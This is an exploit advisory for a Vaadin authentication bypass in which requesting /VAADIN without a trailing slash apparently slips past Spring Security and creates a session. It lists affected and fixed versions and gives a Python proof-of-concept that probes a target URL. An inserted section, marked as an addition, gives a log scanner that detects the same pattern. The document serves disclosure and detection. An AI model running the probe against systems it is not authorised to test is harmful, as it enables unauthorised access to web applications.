Vaadin 25.x Authentication Bypass

Published: 09 Apr 2026. Reported by: indoushka. Type: packetstorm. Source: packetstorm.news

Vaadin authentication bypass via /VAADIN without trailing slash enables unauthenticated session creation.

Code
==================================================================================================================================
    | # Title     : Vaadin 25.x Authentication Bypass                                                                                |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://vaadin.com/                                                                                              |
    ==================================================================================================================================
    
    [+] Summary    : This vulnerability affects multiple versions of Vaadin (6.8.13, 14.x, 23.x, 24.x, and 25.x) when used with Spring Security, due to inconsistent path pattern matching on reserved framework routes.
                     Accessing the /VAADIN endpoint without a trailing slash can bypass the security filters, allowing unauthenticated users to trigger framework initialization and create valid sessions without proper authorization.

    [+] It was successfully tested on: 6.8.13
    
    [+] This impacts Vaadin versions:
    
    14.0.0 – 14.14.0 → fixed in 14.14.1
    23.0.0 – 23.6.6 → fixed in 23.6.7
    24.0.0 – 24.9.7 → fixed in 24.9.8
    25.0.0 – 25.0.1 → fixed in 25.0.2+
    
    [+] Older unsupported branches (10–13 and 15–22) are also affected and require upgrading to supported releases.
    
    [+] A Python proof-of-concept scanner demonstrates the issue by requesting the /VAADIN endpoint and checking for signs of session creation.
        If the server returns HTTP 200 along with a JSESSIONID cookie, the application is flagged as potentially vulnerable.
        Otherwise, responses like 401 or 302 suggest that authentication protections are still active.
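    The same two indicators (HTTP 200 plus a fresh JSESSIONID versus a 401/302) can be checked from the server side. The scanner below is an added, defender-oriented example and is not part of indoushka's advisory; it assumes an access log that appends the Set-Cookie response header after the standard fields (for example Tomcat's AccessLogValve with a `%{Set-Cookie}o` field), and the sample lines are constructed.

```python
import re
from typing import List, Optional, Tuple

# Access-log line with the Set-Cookie response header appended after the
# standard fields (e.g. Tomcat AccessLogValve pattern
# '%h %t "%r" %s %b "%{Set-Cookie}o"'). The log format is an assumption here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<set_cookie>[^"]*)"$'
)

# (client ip, timestamp, status, session_created)
Finding = Tuple[str, str, int, bool]

def is_exact_vaadin_root(target: str) -> bool:
    """True only for the reserved route with no trailing slash.
    The query string is ignored; /VAADIN/ and /VAADIN/anything do not count."""
    return target.split("?", 1)[0] == "/VAADIN"

def parse_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def scan_log(lines: List[str]) -> List[Finding]:
    """Report every request to the exact /VAADIN route. HTTP 200 together with
    a new JSESSIONID is the session-creation signature from the advisory;
    401/302 means the security filter chain still blocked the request."""
    findings: List[Finding] = []
    for line in lines:
        rec = parse_line(line)
        if not rec or not is_exact_vaadin_root(rec["target"]):
            continue
        status = int(rec["status"])
        created = status == 200 and "JSESSIONID=" in rec["set_cookie"]
        findings.append((rec["ip"], rec["ts"], status, created))
    return findings

# Constructed sample lines (not real traffic): one blocked probe, one bypass,
# and two requests that are not the exact /VAADIN route.
SAMPLE_LOG = [
    '203.0.113.5 [09/Apr/2026:10:00:01 +0000] "GET /VAADIN HTTP/1.1" 302 0 ""',
    '203.0.113.5 [09/Apr/2026:10:00:02 +0000] "GET /VAADIN HTTP/1.1" 200 512 "JSESSIONID=ABC123; Path=/; HttpOnly"',
    '198.51.100.7 [09/Apr/2026:10:00:03 +0000] "GET /VAADIN/ HTTP/1.1" 302 0 ""',
    '198.51.100.7 [09/Apr/2026:10:00:04 +0000] "GET /VAADIN/static/x.js HTTP/1.1" 200 9000 ""',
]

if __name__ == "__main__":
    for ip, ts, status, created in scan_log(SAMPLE_LOG):
        tag = "SESSION CREATED (bypass indicator)" if created else "blocked"
        print(f"{ts} {ip} GET /VAADIN -> {status}: {tag}")
```

    A hit with the session-created flag after the upgrade to a fixed release (14.14.1, 23.6.7, 24.9.8 or 25.0.2+) means the patch did not take effect in that deployment.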
    
    [+] POC   :  
    
    
    import requests
    import sys
    
    def check_vaadin_auth_bypass(url):
        """
        Checks if a Vaadin application is vulnerable 
        by accessing the /VAADIN endpoint without a trailing slash.
        """
        target_url = url.rstrip('/') + '/VAADIN'
        headers = {
            'User-Agent': 'indoushka-Scanner'
        }
        
        try:
            print(f"[*] Checking {target_url}")
            response = requests.get(target_url, headers=headers, allow_redirects=False, timeout=10)
            
            if response.status_code == 200 and 'JSESSIONID' in response.cookies:
                print(f"[!] VULNERABLE: Authentication bypass succeeded on {target_url}")
                print(f"[!] New session created: {response.cookies.get('JSESSIONID', 'Not Found')}")
                return True
            elif response.status_code == 200:
                print(f"[-] Got HTTP 200 but no new JSESSIONID cookie. Might not be vulnerable or already patched.")
            elif response.status_code == 401 or response.status_code == 302:
                print(f"[-] Not vulnerable. Received HTTP {response.status_code} (authentication required or redirect).")
            else:
                print(f"[-] Unexpected response: HTTP {response.status_code}")
                
        except requests.exceptions.RequestException as e:
            print(f"[ERROR] Could not connect to {target_url}: {e}")
        
        return False
    
    if __name__ == "__main__":
        if len(sys.argv) != 2:
            print("Usage: python poc.py <target_base_url>")
            print("Example: python poc.py https://example.com")
            sys.exit(1)
            
        target = sys.argv[1]
        check_vaadin_auth_bypass(target)
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
